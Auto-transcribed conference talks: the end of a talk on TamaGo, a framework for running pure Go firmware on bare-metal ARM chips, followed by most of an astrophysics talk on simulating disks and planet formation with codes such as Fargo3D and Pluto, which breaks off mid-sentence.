assistant call is made which in this case the right system call it is just hooked to the actual driver support within the Go package but we are all within Go and we use the vanilla Go runtime with the exception of a few initialization and runtime support function which are only specific to Tamago which are the ones that are actually serving system calls and so forth. So this is the change and again we're dramatically reducing not only the lines of codes count but we are completely eliminating C because in this setup the only C is actually the boot loader which it goes away after boot but anyway we are also working on replacing that but there is no C involved at all not a single line in all of this. So how do you develop build and run this thing? Well so in order to use it you write Go as you always did and you just import the board package that's the only thing that you need to do. If you are not using the driver specifically that's the only thing you need to do. If you want to use a driver like random number generator or USB then you also need to import that as you would in Go but to run basic operation that's the only thing that you need. So that's the first step. Then you compile with Go build as usual with the exception of a few flags to the linker where we need to tell and this depends on the board what the entry point is going to be and where are we going to have the text of our the text segment of our application but that's it. So we have Go as Tamago, Go arm 7, Go arch arm and then we just use Go build. So Tamago here is a variable where we have just the go runtime compile with Tamago support. And then this is U boot boot loader you just load the resulting elf. That's it. There's no intermediate boot loader needed it just you would just run this application as you would a kernel. So we implemented drivers security or rented drivers for our system on chip to prove ourselves that this can actually be used. And this was an important part of the process. So the IMAX 6ULL which we use on the USB armory has a few security drivers that we needed to enable. So the first one that we developed was for the data co-processor which is the element that allows you to do encryption and decryption and key derivation with a hardware unique key which is fused at the first power up of the system on chip within the chip. It's fused you cannot read it you can only use it and it's unique for each chip. So we brought a driver for that the driver takes about 240 lines of code which is I think 10 times less than the Linux kernel module for this. And then if you load its package you can just invoke the arrive key and you can derive a key using using the hardware. And also the text if you're secure booted or not. And also note the nice thing is that we can use structures that we create in Go so they can be made C compatible with a little effort so you can use them to and pass them to the actual hardware to the memory so that data can be allocated. So we just allocate a structure here and then we actually pass a pointer to things to the structure and it just works. Here at the bottom here we're actually writing the address of our Go allocated structure to register to the hardware register and then the hardware will get fetched the structure and do its work. We wrote the driver for the random number generator. There's a true random number generator within the system on chip which can be used for the very first boot when you because this kind of hardware doesn't have a battery there's no real time clock so the very first boot you don't have any you need an initial seed and this is a good use for that. And so we also wrote 150 lines a driver for this and we hooked it to the crypto run function of Go so you just use Go normally and the random number generators if you use crypto run they're going to come from this. Then I wrote a USB driver which is something that makes you question your life choices. I tell you where you're at that point in your life that you're writing almost 40 years old in your writing USB driver. However, my only concern was reading and studying reference manual at least it wasn't dealing with with C and memory and so forth. So actually Go really helped me keeping keeping me happy because I could use Go routines I could use channel I could use mutex's whenever I wanted so it was a delight. My only problem was actually understand me the reference manual and when developing drivers with Go there's only two aspects that you need to care about which are unusual for Go programmers because they never have to deal with that. You need aligned structures in memory because most hardware will refuse to load data from an aligned pointer so we created a class for that and to keep the garbage collector happy you need to carry around the underlying buffer which allows us to do the buffer alignment but again that's the only concern that you really need to take care about. And so we have a full driver. We also for every driver that we do every time we touch the hardware we put the page number and the name and the section of the reference manual because trust me on that by looking at code from the Linux kernel and other projects there were so many quirks that if there would have been just one comment to the right page you could have saved yourself hours of just learning. So if you want to learn about system on chip and driver development we also put all of the references that you need in order to understand what's going on and I think that's something that's missing a lot into kernel modules these days. USB networking so once I had the USB driver we implemented USB networking in two hours that was easy so half of the code is just defining the scriptors and then we define two functions for transmitting and receiving ethernet over USB packets and we have the two functions and we hook them to Google net stack which is a very nice full goal TCPAP stack made by Google and so we just pull that in and now I'm going to show you the demo of all of this if the demo gods have been kind to me. So on the left side I'm going to boot my USB armory with Tamago. So this is Tamago running so what it did in these few seconds the boot loader booted directly into go self test of the random number generator we changed the clock speed we say hello because we're polite we launched seven go routines we derived a key we read a finding memory we slept for 100 milliseconds to make sure that the time implementation is correct we generated a few random numbers we made a few ACCA signatures we signed a bit transaction the go routine completed then we allocated about 1.5 gigabytes of memory just because to check the garbage collection works and now we are waiting for USB so if I plug it in into my other USB armory I have a USB armory connected to the USB armory it's very meta so now the USB descriptor has been evaluated and now we already see network traffic so if I connect to my USB armory now so hello this is a simple UDP Echo server I can ask for a random number I can debug the memory and I can also do this I can stream Star Wars in ASCII and if it's not as smooth as you think it should be the problem is not the armory it's actually Windows which doesn't support console very well so so so yeah all except for the boot part except for the boot loader all of your scene here USB TCP IP handling streaming everything there's not a single line of C code involved it is pure go and little assembly and I think that this is I think this is pretty cool I don't know what you but yeah so performance we'll see if the movie ends while we go so performance as expected the speed is the same compared to running the same go application under Linux so this is an example of ECDSA signatures from the go compiler test suite running under Linux on the same hardware and running under Tamago and the times are actually identical because you know and this is this is what supposed to be is supposed to be at our identical or even faster because we have less overhead from the operating system doing content switching there are few limitations there are very few and working on them so first of all on this hardware we're single threaded so if you have a tight loop and you have functions in this tight loop which don't go back to the runtime it's going to be stuck forever there this is not unique to us this is what go does every time you have a max procs one and you're single threaded so this is this is expected and normal and you can also avoid it by the way you can you can force invocation to the scheduler in tight loops but usually if you have really tight loops that don't do anything it's just because you're testing Tamago not because you're actually doing real work we have to implement our five system storage so five system support and storage so we're gonna we're gonna do that if you're import a package that needs something which requires an OS such as terminal console and so forth is not gonna work but that's expected you can link if you want c code but why would you after my talk right but you can if you want as long as it's freestanding there's no s there's no users there's no signals there's no environment variables this is a feature not a bug so with the expression of the few surprises again go is surprisingly adept to run on bare metal and now we're gonna use this in the future to write the secure firmware that we want to write HSM's cryptocurrency wallet authentication tokens trust on secure monitors and much more this is the baseline for developing secure applications on this kind of hardware so again we learned that we can reduce complexity not just shift it around we kill see completely at least in this very specific implementation and again it's all about enabling the choice of a language which didn't have much chance on the bare metal but now we think it has and we just wanna in the next months to build trust with this and maybe have it accepted upstream so thanks to all these people that enable us to do this project and now I have two minutes for questions I hope just one couple of questions thank you so much thank you Andrea perfect ending time 1337 so we still have 13 minutes for Q&A so if you want to ask questions we have three microphones please line up here microphone three is actually equipped with an induction loop if you're using hearing aids and I get a signal we have questions from the signal angel in the very back from the internet hello I have two questions from the internet from the IRC the first one is does the garbage collector somehow cause performance issues on bare metal no not in our experience and also when working on the bare metal if you really want you can also turn it off I mean that's something that go always had you can turn off the garbage collection if you want and you can run it at a very specific times or if your application is short lived and has predictable memory allocation you can also decide not to run it at all it really depends on what you're doing in our experience for the operations that we need to do we never stumble into problems and its performance and behavior is pretty much the same that you would see on normal go application running under normal OS there's actually no difference we're not changing its behavior okay thank you the next question the next question and the last question is is tamago suitable for real time applications and if so how much I think that by disabling the garbage collection possibly it can I'm not a big fan of real time operating systems in our work experience every time somebody use a real time operating system they had so many bugs anyway that the real time parts wasn't really working really well and actually they really didn't need it but of course there are some application financial applications where you really need it if you have the time and effort for that Rust is probably a much better suited language for that having said that I think there might be a chance that by turning garbage collection off this can also be worried because in the end the result is very predictable if you turn garbage collection off next question from microphone number one please thanks for a project three small questions first do usually look at the assembly which you have after compiling on your platform second go is very famous for fuzzing you have some fuzzing of your applications on your platform and the last one did you find any bugs in go runtime while porting on your platform so yes we look at the assembly we also use the go assembler ourselves the generation is identical again to what you have with normal go on x86 or sorry with arm the difference is that it runs on the bare metal so but the efficiency that you're going to get when compiling is the same because we're not touching that we're not touching the go assembly we just use it the second question fuzzing fuzzing so we want to use these to fuzz USB actually one of our projects is to implement a low level USB fuzzer with the use me armory that can fuzz the host we're also trying to understand how we can integrate fuzzing of this externally we'd go by using go fuzz but yes it's something that we're thinking of and the third one did you find any bugs in yes time itself yes in fact if you look when you get the slides just just look at this slide there's a fun go bug in the top right in the bottom right corner about the garbage collection so yeah we found at least one it's a it's a weird property but yeah we found one but we have we're working with the people that work on the go compiler for a living and they're being so supportive so so yeah but it's not a stopper not a minute we didn't find anything that was a show stopper for us thank you excellent thank you we have another question from the internet via our signal angel yes there are three more questions I think we have time for that one okay then we take well you get all three but just one now the easiest one okay how suitable would tamago be for writing code for other microcontrollers for example 32 you fall so for microcontrollers just go with tiny go because the footprint of applications built with the standard go compiler is pretty large so tiny go which is a great project is a very good reason to exist so for microcontrollers tiny go system and chips tamago that's separation next question microphone three please hello thank you very much for the talk and for the work so will you be supporting other targets as well like the armory mk1 and all winner chips yes so we plan to support the armory make one mark one and we also plan to support the raspberry pi zero we're actually working on that right now because of course we don't want to just support our hardware I think it's important to to give the chance to other projects of this and it's actually very easy to support other pieces of hardware it's only a few days of work so yes definitely and pull requests are welcome okay back to the signal angel all right another question is oh I got it can this be run on other cortex R class processes or is it the same use tiny go it can be it can be executed on any system on chip that has arm architecture support within the gold runtime so I would say that it would be trivial to run it on any arm v7 system on chip and it should be very easily adaptable to two other ones again the number of modifications required and the hardware initialization make it so that it's easy to port it to other platforms so as long as we're talking about system on chips with cortex it should be fairly easy to do yeah thank you for the question for the answer I have more questions what would tamago also run on the USB armory mk1 yes yes definitely so we're gonna we're gonna make sure that we provide that support soon enough a very interested c only developer asked on Twitter what is about debugging breakpoints register maps and register many manipulation on the MCU using tamago gdb works beautifully so we use gdb we use breakpoints we can stop anywhere we want we see the code just like any other application otherwise we would have gone insane so yes that works okay next up microphone number two please you mentioned file system support yes are you using I think you mentioned fat do you use the there's a pure gold implementation for this sorry no I'm black in the name the future project I think as a full fat implementation can you speak up a bit please oh yeah the future implementation I think they're using a user space driver for fat right that's all in go yeah fat pure gold fat implementation they're already out there's something low the GERD project already has that and also has the MMC support so we're gonna we're gonna we're gonna try and get that and put it in it should be it should be very trivial effort and I just mentioned a fact because it's a easy file system format and usually on a better system you just want to take a blob write it read it you don't need fancy storage thanks microphone number one please thanks for the talk have you talked to upstream about getting it into the mainline yes we're working on that we're very anxious about it because we want everything to be super clean but it is our intention to give this the best possible chance and we have contacts upstream and this was coded from the very beginning with intention to make things clean nice respectful and what's already there in the go around team we didn't want to hijack things that are not meant to be hijacked and that's our goal because in the end I don't want to maintain the compiler part I just want to maintain the drivers and everything else so yeah we're really trying hard to make this in a in a state where it has the best chance to be accepted upstream do you have a timeline no but I would hope by the end of next year would it be still called Tamago and why is it called Tamago so it probably won't be called Tamago it is called Tamago because Tamago means egg in Japanese and you have go and go lives on bare metal in its own shell and so it's Tamago and if you run it under Qimo it's a Tamago. Thank you. This is the only reason why we do these projects we first come up with a name and they were like oh what can I do with that name yeah do we have any more questions from the internet no we do not I think we have another question at microphone number one how is it two days embedded system often have some screens. Well the USB armory has no screen so it wasn't our focus right now having said that there's no reason why you couldn't implement a video driver with this maybe won't be as performant as it can but if you're doing DMA right and you're clever enough of course it can work but for now it's not it's not our focus our focus now is having smarter smart cards, HSM tokens, authentication tokens so we have Bluetooth on the USB armory we have USB for now if we really want a UI with the USB armory we either have a mobile app or you do it through networking but yes maybe in the future who knows. Are there any more questions I guess not well then thank you. Thank you so much thank you. you
TamaGo is an Open Source operating environment framework which aims to allow deployment of firmware for embedded ARM devices by using 0% C and 100% Go code. The goal is to dramatically reduce the attack surface posed by complex OSes while allowing unencumbered Go applications. TamaGo is a compiler modification and driver set for ARM SoCs, which allows bare metal drivers and applications to be executed with pure Go code and minimal deviations from the standard Go runtime. The presentation explores the inspiration, challenges and implementation of TamaGo as well as providing sample applications that benefit from a pure Go bare metal environment. TamaGo allows a considerable reduction of embedded firmware attack surface, while maintaining the strength of Go runtime standard (and external) libraries. This enables the creation of HSMs, cryptocurrency stacks and many more applications without the requirement for complex OSes and libraries as dependencies.
10.5446/53196 (DOI)
I have to say I'm always deeply impressed about how much we already learned about space, about the universe and about our place in the universe, our solar system. But the next speakers will explain us how we can use computational methods to simulate the universe and actually grow planets. The speakers will be Anna Penzlin. She is a PhD student in computational astrophysics in tubing. And Caroline Kimmich, she is a physics master's student at Heidelberg University. And the talk is entitled, Grow Your Own Planet, How Simulations Help Us Understand the Universe. Thank you. So hi everyone. It's a cool animation, right? And the really cool thing is that there's actually physics going on there. So this object could really be out there in space, but was created on a computer. So this is how a star is forming, how our solar system could have looked like in the beginning. Thank you for being here and that you're interested in how we make such an animation. Anna and I are researchers in astrophysics and we're concentrating on how planets form and evolve. She's doing her PhD in tubing and doing my master's in Heidelberg. And in this talk, we want to show you a little bit of physics and how we can translate that in such a way that a computer can calculate it. So let's ask a question first. What is the universe? Or what's in the universe? The most part of the universe is something we don't understand yet. It's dark matter and dark energy. And we don't know what it is yet. And that's everything we cannot see in this picture here. What we can see are stars and galaxies. And that's what we want to concentrate on in this talk. But if we can see it, why would we want to watch a computer? Well, everything in astronomy takes a long time. So each of these tiny specks you see here are galaxies, just like ours. This is how the Milky Way looks like. And we're living in this tiny spot here. And as you all know, our Earth takes one year to orbit around the Sun. Now think about how long it takes for the Sun to orbit around the center of the galaxy. It's 400 million years. And even the star formation is 10 million years. We cannot wait 10 million years to watch how a star is forming, right? That's why we need computational methods or simulations on a computer to understand these processes. So when we watch to the night sky, what do we see? Of course, we see stars and those beautiful nebulas. They are gas and dust, and all of these images are taken with Hubble Space Telescope. So there's one image that doesn't belong in there. But it looks very similar, right? This gives us the idea that we can describe the gases in the universe as a fluid. It's really complicated to describe the gas in every single particle. So we cannot track every single molecule in the gas that moves around. It's way easier to describe it as a fluid. So remember that for later. We will need that. But first, let's have a look how a star forms. A star forms from a giant cloud of dust and gas. Everything moves in that cloud. So eventually, more dense regions occur, and they get even denser. And these clumps can eventually collapse to one star. So this is how a star forms. They collapse due to their own gravity. And in this process, a disk forms, and in this disk, planets can form. So why a disk? As I said, everything moves around in the cloud. So it's likely that the cloud has a little bit of an initial rotation. As it collapses, this rotation gets larger and faster. And now you can think of making a pizza. So when you make a pizza and spin your dough on your finger, you get a flat disk, like a star, like a disk around a star. That's the same process, actually. In this disk, we have dust and gas. From this dust in the disk, the planet can form. But how do we get from tiny little dust particles to a big planet? Well, it somehow has to grow. And grow even further and compact until we have rocks. And even grow further until we reach planets. How does it grow? Well, that dust grows, we know that. At least that's what I observed when I took those images in my flat. Well, so dust can grow and grow even further and compact. But when you take two rocks, we're now at this in this stage, when you take two rocks and throw them together, you do not expect them to stick. You expect them to crash and crack into a thousand pieces. So we're standing on the proof that planets exist. How does this happen? And it's not quite solved yet in research. So this is a process that is really hard to observe, because planets are very, very tiny compared to stars. And even stars are only small dots in the night sky. Also, as I said, planets form in a disk, and it's hard to look inside the disk. So this is why we need computation to understand a process, how planets form and other astronomical processes. So let's have a look at how we simulate it on a computer. Okay. So somehow we have seen nature. It's beautiful and just like a tank of water and a bubbly fluid we already have. So now we have this bubbly fluid here in the middle demonstrated. But now we have to teach our computer to deal with the bubbly fluid, and that's way too much single molecules to simulate them, as we already said. So there are two ways to discretize it in a way that we just look at smaller pieces. One is the Lagrangian description, just like taking small bubbles or balls of material that have a fixed mass. They have a certain velocity that varies between each particle, and they have, of course, a momentum because they have a velocity and a mass. And we create a number of those particles and then just see how they move around and how they collide with each other. That would be one way. That was described last year in a very good talk. I can highly recommend to hear this talk if you're interested in this method. However, there's a second way to also describe this, not just going with the flow of the particles, but we are a bit lazy. We just box it. So we create a grid. As you see down here, in this grid, you have a certain filling level, a bit of a slope height. So what's the trend there? And then we just look for each box, what flows in, what flows out through the surfaces of this box. And then we have a volume or a mass filled within this box. And this is how we discretize what is going on in the disk. And actually, since we are usually in the system of a disk, we do not do it in this nice box way like this, but we use boxes like those because they are already almost like a disk. And we just keep exactly the same boxes all the time and then just measure what goes through the surface in these boxes. So this is how these two methods look like if you compute with both of them. So one was done by me. I'm usually using this boxing method and the other was done by my colleague. You see this, like, when you look at them at the colors, at the structure, here you have the slope inward, you have the same slope inwards here. You have even the silly structure here, the same here. But what you notice is you have these enlarged dots that are really, these are really the mass particles we saw before, these bubbles. And here you have this inner cutout. This is because when you create this grid, you have the very region at the inner part of the disk where the boxes become tinier and tinier. And while we can't compute that, so we have to cut out at some point the inner part. So here when you go to low densities, these bubbles blow up and distribute their mass over a larger area, so it's not very accurate for these areas. And here we have the problem. We can't calculate the inner area. So both methods have their pros and cons and our wallet. But now, for most, we will focus on this one. So we have this nice, actually, stream features. So again, going back to the boxes, we have to measure the flow between the boxes. This flow in physics, we call it flux. And we have a density, row one, a density, row two. And the flux is the description of what mass moves through the surface here, from one box to the next. So if we write this in math terms, it looks like this. This says the time derivative of the density, meaning the change in the change over time, so how much faster is lower you go, the velocity would be a change in time. And then this weird triangle symbol, it's called nabla, is a positional derivative. So it's like a slope. So how much, how do we change our position, actually? So if we change, look at the density over time, it should correlate to what inflow we have over position. That is what that says. So and then we have in physics a few principles that we have always to obey because it's just almost common sense. One of them is, well, if we have mass in a box, like this, the mass should not go anywhere unless someone takes it out. So if we have a closed box and mass in that box, nothing should disappear magically. We should stay. It should all stay in this box. So even if these particles jump around in our box with a certain velocity, it's the same number of particles in the end. That's again the same equation just told in math. So a second very rudimentary principle is if we have energy in a completely closed box, so for example, this nice chemicals here, and we have a certain temperature. So in this case, our temperature is low, maybe outside of around zero degree Celsius, and then we have this nice chemicals down here. And at some point they react very heavily. We suddenly end up with much less chemical energy and a lot more thermal energy. But overall, the complete energy summed up here, like the thermal and the chemical energy, also the energy of the movement and the energy of potential added up to this variable U, that should not change over time if you sum up everything because our energy is conserved within our closed box. And then the third thing is, I think you all know this, if you have like a small mass with a certain velocity, a very high velocity in this case, and it bumps into someone very large. What happens? Well, you get a very small velocity in this large body and the smaller mass stops. And the principle here is that in momentum is conserved, meaning that the velocity times the mass of one object is the same as then later for the other one, but since it's larger, this product has to be the same. That doesn't change. And we have also, like in our simulations, to obey these rules. And we have to code that in so that we have physics in them. So you say, okay, this is really simple, these rules, right? But actually, well, it's not quite as simple. So this is the Navier-Stokes equation. It's a very complicated equation. It's not completely solved. And we have here all that is marked red, other derivatives. Here we have our conservation law that was the nice and simple part. But now we have to take other physical things into accounting for pressure, accounting for viscosity, for compression. So squeezing and how sticky is our fluid and also gravity. So we have a lot of additional factors, additional physics. We also have to get in somehow. And all of these also depend somehow on the change of position or the change of time. And these derivatives aren't really nice for our computers because they, well, they don't understand this triangle. So we need to find a way to write an algorithm so that it can somehow relate with these math formula in a way that a computer likes. One of the ways to do this is, well, the simplest solution actually is just we say, okay, we have now these nasty derivatives and we want to get rid of them. So if we look just at one box now, we say that in this box, the new value for the density in this box would be the previous density plus the flux in and out times the time step over which we measured this flux. And we have to somehow get to this flux and we just say, okay, this flux now is, if we start here, the slope of this curve, the trend, so to say, where this curve is going right now, so it would look like this. So in our next time step, we would have a density down here and, well, then we do this again. We again look at this point, where's the trend going, where's the line going? And then we end up here, same here. So again, we just try to find this flux and this is the trend at this position in time. So this goes up here and then if we are here now, look at this point, it should go up here. So this is what our next trend would be. And we do this over all the times and this is how our simulation then would calculate the density for one box over different time steps. So that kind of works. So the blue curve is the analytical one, the red curve, well, it's kind of simulatized, it works, but can we do better? It's not perfect yet, right? So what we can do is we refine this a bit, taking a few more steps, making it a bit more computationally heavy, but trying to get a better resolution. So first we start with the same thing as before, we go to this point, find the trend in this point, that point, like the line would go in this direction from this point and then we go just half a step now. And now we look at this half a step to this point now and do it again, the same saying, okay, where's the trend going now, and then we take where this point would go and add it to this trend. So that would be that the average of this trend, of this exact point, and this trend, this dark orange curve. And then we go back to the beginning with this trend now and say this is a better trend than the one we had before. We now use that and go again and search the point for half a time step. And then again we do the same thing. Now we again try to find actually the trend and average it with the arrow before. So it's not exactly the trend, it's a bit below the trend because we averaged it with the arrow before. And now we take this averaging trend from the beginning to the top like this. Okay, this is already quite good, but we can still do a little bit better if we average it with our ending point. So we go here, look where's the trend going, that would go quite up like this. And we average this and this together and then we end up with a line like this. This is so much better than what we had before. It's a bit more complicated to be fair, but actually it's almost on the line. So this is what we wanted. So if we compare both of them, we have here our analytical curve. So over time in one box, this is how the density should increase. And now with both of the numerical method, the difference looks like this. So we have smaller and smaller time steps, even the Euler gets closer and closer to the curve, but actually the Runge-Kutta, this four-step process works much better and much faster, however it's a bit more computationally difficult. When we simulate objects in astronomy, we always want to compare them to objects that are really out there. So this is a giant telescope, well, consisting of a lot of small telescopes, but they can be connected and used as a giant telescope. And it takes photos of dust in the sky and this is used to take images of discs around stars and these discs look like this. So these images were taken last year and they are really cool. Before we had those images, we only had images with less resolution, so they were just blurred blobs. And we could say, yeah, that might be a disc, but now we really see the discs. And we see rings here, thin rings, and we see thicker rings over here, and even some spirally structures here, and also some features that are not really radially symmetric like this arc here. And it's not completely solved how these structures formed. And to find that out, a colleague of mine took this little object with the asymmetry here. And so this is the imagery Chester, and this is his simulation. So this is how discs looked like in the beginning, probably, and he put in three planets and let the simulation run. And so what we see here is that the star is cut out. As Anna said, we have to, so the grid cells in the inner part are very, very small and it would take a lot of time to compute them all. So that's why we are leaving out that spot in the middle. And what we see here is three planets interacting with the material in the disc. And we can see that these planets can make this thing here appear so that in the end we have something looking very similar to what we want to have or what we really observe. So we can say three planets could explain how these structures formed in this disc. It's a little bit elliptical, you see that. That's because it's tilted from our side of line. It would be round if we watched that it face on, but it's a little bit tilted. That's why it looks elliptical. So we already saw we can put planets in the gas and then we create structures. One very exciting thing that we found in the last year or two years ago, it started, but then we found more, is this system, PDS 70, in this system, for the very first time, we found a planet that was still embedded completely within the disc, so the gas and dust. Usually because the gas and dust is the main thing that creates a signal, some radiation because of heat. We only observe that and then we can't observe the planet embedded, but in this case the planet was large enough and in the right position that we actually were able to observe some signature of accretion on this planet that was brighter than the rest of the disc. Then later, just this year, just a few months ago, we actually found out, well, this is not the only object here. This is a very clearly a planet, but actually this spot here is also something. We can see it in different grains. Every picture here is a different set of grains observed. We can see this in four different, five different kinds of observations. So there is a planet here. Then there is also something, we don't know what it is yet, but it's point-like and actually creates a feature that we reproduce in different kinds of observational bands or different kinds of signals here. This is very interesting. For the first time, we actually see a planet forming right now within the disc. So a colleague of mine also is very interested in this system and started to simulate how do two planets in a disc change the dynamics of a disc. So here we have, of course, this disc is again tilted because it's not phase-on. It's like 45 degrees tilted, not like this, but like this. So he had it phase-on. This is what his simulation looks like. So there are two planets that these blobs here again, as in the simulation. Here we have a close-up. You can actually see these little boxes are actually our simulation boxes in which we have our densities. Then he just looked at how the planets would change the structure in the gas and also how the gas would interact with the planets shifting them around. It's interesting. The planets tend to clear out an area, open a gap within the disc, block a lot of gas around here, so you have a brighter ring here again, and then clearing out more and more. At some point in the simulation, he saw they get a bit jumpy. So it's very nice. You also see that the planets induce in the whole disc some kind of features, like spiral features. So a single planet will change the symmetry and the appearance of a whole disc. So the reason why the planet is staying at this point is because we're rotating with the planet. It's actually going around the disc, but the camera is rotating with the planet, so it's staying at the fixed place we put it in. But there's more. Because as I already said in the Navier-Stokes equation, we have a lot of different kinds of physics that we all have to include in our simulations. One of the things, of course, is we maybe don't have just a star in the disc. We have planets in there, and maybe two stars in there, and all of these larger bodies have also an interaction between each other. So if we have a star, every planet will have an interaction with a star, of course. But then also the planets between each other, they have also an interaction, right? So in the end, you have to take into account all of these interactions. And then also we have accretion, just looking like this. So accretion means that the gas is bound by some object. It can be the disc, the planet, or the star that takes up the mass, the dust, or the gas. And it's bound to this object. And then it's lost to the disc or the other structures, because it's completely bound to that. So the principle of this would be a simulation I did last year and published. We have here a binary star. So these two dots are stars. I kind of kept them in the same spot, but every picture will be one orbit of this binary. But since we have interactions, you actually see them rotating because of the interactions, which is other. And then also we have here a planet and here a planet. And the interesting thing was that these two planets interact in such a way that they end up on exactly the same orbit. So one starts further out, the orange one, and then very fast they go in and they end up on exactly the same orbit, if it now would play nicely. So another thing is with the accretion here, we actually see clouds from above dropping down onto the new forming star here. So all of this, what you see here would be gas, hydrogen. And it's a very early phase, so this is not completely flat. It has a lot of material and then you actually have this info from above towards the star and then the star keeps the mass. And we have to take this also into account in our simulations. Another thing we have to take into account up till now, we just cared about masses and densities. But of course, what we actually see is that stars are kind of warm, hopefully. Otherwise, temperatures here would also not be nice. And different chemicals have different condensation points. And this is also true in a system. So we start with the star temperature, at the surface of the star, we have a temperature around 4000 Kelvin. And then we go a bit into the disk and there's a point where we, for the first time, reach a point where we have any material at all because it starts to condensate and we actually have something solid like iron, for example, at 1500 Kelvin. And then if we go further in, we reach a point where we have solid water. And this is at 200 Kelvin. This is what we then would need, actually, to have a planet that also has water on it because if we don't get the water in the solid state, it will not fall onto a terrestrial planet and be bound there, right? So this is important for our earth, actually. And then if we go even further out, we have also other gases condensating to solids like CO2 or methane or things like that. And since we only get water on a planet when we have a temperature that is low enough so that the water actually forms a solid, it's important for us to think about where that is in our forming disk. Where do we start to have a planet like earth that could have some water, right? But it's not just the simple picture where we have all these nice ring structures where we have a clear line, actually. It gets more complicated because we have pressure and shocks and thermodynamics is a lot like pogo dancing, right? You crash into each other and it's all about collisions. So the gas temperature is determined by the speed of your gas molecules, like here, bouncing and crashing into each other, exchanging momentum. So there's two ways to heat up such dance. First thing is you get a large amount of velocity from the outside, like a huge kick, a shock into your system. And second way would be if we have a higher pressure, like more molecules, then also you of course have more collisions and then a higher temperature. So if you change because you have a planet now in the system, the pressure at some point, you actually get a higher temperature. So that is not then we lose this nice line because suddenly we have different pressures at different locations. And the colleague of mine also simulated this. So it starts off ninth. So this is the initial condition. We just assumed, okay, if we have no disturbance whatsoever, we have our nice planet here at one AU, so same distance as Earth to the Sun here too. But here we assume that less heat gets transferred from the surface of the disk. And here we have a planet far out like Jupiter or something. And now we actually let this planet change the structure of the disk and what happens is we found these spirals. And within these spirals, we change pressure. And with this, actually, if you see this orange everywhere where it's orange, it's hotter than the ice line. So we don't have water where it's orange. And where it's blue, we can have water. And the interesting thing is even if we put a planet out here like Jupiter, we still form these regions in the inner system where we have less water. One problem in astrophysical simulations is that we don't always know how to shape our boxes or how small these boxes have to be. So we use a trick to reshape the boxes as we need them. It's called adaptive mesh. And this is a simulation of the red fluid flowing in this direction and the blue fluid in the other one. So at the boundary, the two fluids shear and they mix up somehow. And we don't know how in advance. So we start a simulation. And as the simulation starts, we reshape those boxes here. So in the middle, we don't need much reshape because it's not that complicated here. It's just a flow. But at the boundary, we see those mixing up of the two fluids. And so we reshape the cells as we need them. This is done in an astrophysical program called ARIPO. We will later show you some more programs to use for simulations. But another simulation I want to show you first is also done with ARIPO. And it's a simulation of the universe. So from here to here, it's very big. It's 30 million light years. So each of these dots you see here is the size of a galaxy or even more. And here you can actually see that at some regions, it's very empty. So we're rotating around this universe, this simulated universe here. And these regions here are empty and we don't need a lot of boxes there. Big boxes are enough here. But in this dense regions where we have a lot of material, we need smaller boxes. And this method I showed you where we reshape the boxes as we need them is used for this simulation. So actually you see, it's all the beginning of the universe there. Basically, the initial mass collapsing to the first galaxies and first supernovae starting, very beautiful simulation. So there are different programs as I already mentioned in astrophysics. Three of them, those three are all open source. So you can download them and use them on your own machine if you like. And but there are more, a lot more. And some of them open source, some of them are not. Sometimes it's hard to get them. In the following, we will present the two, Fargo 3D and Pluto in a detailed version or more detailed version than ARIPO. Because we usually use those two for our simulations. What I want to show you with this slide is that depending on what you want to simulate, you need to choose a different program. And one thing is that in astrophysics, we sometimes call the whole program code. So if I use the word code, sorry about that, I mean the whole program. So let's have a look at Fargo 3D. It's a hydrodynamics code and what you see here is an input parameter file. There you define how the disk looks like, how much mass does it have, how big is it, and what planet. So here, a Jupiter. Do you see that? A Jupiter is put in. And we also define how big our boxes are. This program is written in C, which is quite nice because a lot of astrophysical programs are still written in Fortran. So this is good for me because I don't know any Fortran. We can run this. And what's typical for Fargo, so that's a compilation. Actually on my computer, so I don't need a fancy computer. I just did it on my small laptop. And now we run it. Now typical for Fargo, as you will see, are a lot of dots. So here. It will print out a lot of dots. And it will create at certain times some outputs. And these outputs are huge files containing numbers. So if you look at them, they are not really interesting. They just are numbers in something like a text file. So a big part of astrophysics is also to visualize the data. Not only to create it, but also to make images so that we can make movies out of them. For that, I prefer to use Python, but there are a lot of tools. But there are a lot of different tools to visualize the data. So this is actually that output, the first one we just saw. The Jupiter planet in the disk that I defined in this parameter file. And it's already started to do some spirals. And if I would have let it run further, then the spirals were more prominent. And yeah. Now we have a planet here on our computer. So we also have Pluto somehow has a bit more setup files. So what I need is three files here. Looks a bit complicated to break it down. This file defines my grid and initial values and the simulation time here. We input actually what physics do we want to need? What is our coordinate system? So do we want to have a disk or just like spherical boxes or like squared boxes? And how is the time defined? And here we then actually write a bit of code to say, okay, now how do I want a gravitational potential? So what's the source of gravity? Or what will happen at the inner region where we have this dark spot? We have somehow to define what happens if gas reaches this boundary? Is it just falling in? Is it bouncing back or something? Or is it looping through the one end to the next? And this is also something we then just have to code in. And if we then make it and let it run, it looks like this. So again, our nice thing we hopefully put in or wanted to put in, the time steps, what our boundaries were, parameters of physics, hopefully the right ones. And then nicely we start with our time steps. And if we see this, it's hooray. It worked, actually, because it's actually not quite simple usually to set up a running program, a running problem, because you have to really think about what should be the physics, what's the scale of your problem, what's the time scale of your problem, and specify this in a good way. But in principle, this is how it works. There are a few test problems that you actually want to play around with this to make it easy for the beginning. And this is how we do simulations. So as I already said, we can just start them on our laptop. So here this is my laptop. I just type dot slash Fargo 3D, and it should run, right? And then I just wait for 10 years to finish the simulations of 500 time steps or something, like 500 outputs. Well, that's not the best idea. We need more power. And both of us, for example, are using a cluster for a button written back, and that takes down our computation time by a lot, usually like a factor of maybe 20, which is a lot. So I would need on my computer maybe a year, and then I just need maybe five hours, a few days or a week on this cluster, which is usually a simulation time about a week for me. So what you see here is that we use GPUs, yes, but we do not or mostly not use them for gaming. We use them for actual science. Yeah, it would be nice to play on that, right? Yeah. That just said. So back to our Earth, actually. So can we now, we wanted to grow our own planet. We can do that. Yes, of course. Can we grow Earth? Well, Earth is a very special planet. We have a very nice temperature here, right? And we have not a crushing atmosphere like Jupiter, like a huge planet that we could not live under. We have a magnetic field that shields us from the radiation from space, and we have water, but just enough water so that we still have land on this planet where we can live on. So even if we fine tune our simulations, the probability that we actually hit Earth and have all the parameters right, it's actually tiny. It's not that easy to simulate an Earth. And there are a lot of open questions, too. How did we actually manage to get just this sip of water on our surface? How did we manage to collide enough mass or aggregate enough mass to form the terrestrial planet without Jupiter sweeping up all the mass in our system? How could we be stable in this orbit when there are seven other planets swirling around and interacting with us? All of this is open in our field of research, actually, and not completely understood. This is the reason why we still need to do astrophysics. And even in all our 